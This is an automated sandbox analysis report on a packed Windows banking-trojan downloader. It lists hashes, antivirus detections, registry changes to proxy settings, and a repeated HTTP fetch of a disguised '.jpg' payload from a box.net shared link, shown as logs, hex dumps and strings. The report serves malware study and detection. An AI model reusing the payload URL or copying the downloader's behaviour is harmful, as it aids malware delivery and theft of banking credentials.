Analysis Date2014-04-22 06:12:59
MD5ebfed9291bc5245b72cd0a4b04afed25
SHA1aa941b416a496453a3631268f9602a74c206b69b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.nsp0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.nsp1 md5: 20d9279d156b6c3f726de74cb5c19ff6 sha1: 4742f0856080c4229db1b302b60e99fd3081b724 size: 44753
Section.nsp2 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp1992-06-19 22:22:17
PackerNsPack 3.4 -> North Star
PEhash785198a2c2cc77c3028cbe4a07aef7f80a797e57
IMPhashc575de919e22c1b4f97db83abfbc5fab
AVavgPSW.Banker4.XWL
AVaviraTR/Dldr.Delphi.Gen
AVmcafeePWS-Banker.dldr

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSwww.box.net
Winsock URLhttp://www.box.net/shared/static/i6h0vpmuco.jpg

Network Details:

DNSwww.box.net
Type: A
74.112.184.83
DNSwww.box.net
Type: A
74.112.185.83
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1033 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1034 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1035 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1036 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1037 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1038 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1039 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1040 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1041 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1042 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1043 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1044 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1045 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1046 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1047 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1048 ➝ 74.112.184.83:80
Flows TCP192.168.1.1:1049 ➝ 74.112.184.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
.Y..;..U
.
)-

{0SZhHD
1 @1D3
>>1W/#
3PPAt'
3TccXDK
<5]/7OR
5RTie{
$5{#uk
	6de^3*
6FOMk>.
7cV!!b
82Z*Y\tvG
8jMm~4
#8krj8
;90mZ("
@@9A	@J
|9HjREQ
"9khHtI
ADVAPI32.DLL
\AN$t7t
aW&uLP
b/I{r$v
;`cD/^T
c%<H@H
\CKij9kc
CLmr'89
CoUninitialize
CYB|_	
.&d4;`
d"okX*
|`!^Eb?
EbTpd{
EP	SoH
\ES&{K
ExitProcess
Fa^ipcJ
_fl*/9
$%FWO'
GetErrorInfo
GetKeyboardType
GetProcAddress
 $[Go<
H.ov<	
hq[(~V
iY(X	7VA
/J=.4kP
j{qWi3
ka5O3m}
KERNEL32.DLL
l3W]^B
LcaWx;
LoadLibraryA
m>d#E.
MessageBoxA
{N{a	"
O2v;Sa
"OIOcDX
OLE32.DLL
OLEAUT32.DLL
o{UAfme{
^ p&SgQ
[q6XT,
q+hXk)
QnJpFx
=q+R6N
r4kRJ@P
RegQueryValueExA
RegSetValueExA
r%E'<Xx
RLG=P(s
rn0{qF
SafeArrayPtrOfIndex
}_sk\V
sNbUdD
{"}s!o
SysFreeString
\t_()b
This program must be run under Win32
TlsSetValue
TNk&T,Olf/
U,.-.._
]:uBx`#
`@uh)n
[u[=OK
URLDownloadToFileA
URLMON.DLL
USER32.DLL
VirtualAlloc
VirtualFree
VirtualProtect
Vnlagp
>#wcO6=
WriteFile
w>z`Eh
-/x$[g
x)?t[9
y-@82~6
ymIx=L=
Y]{p~.
+Z41fR
Z<eE4l
z;>L,m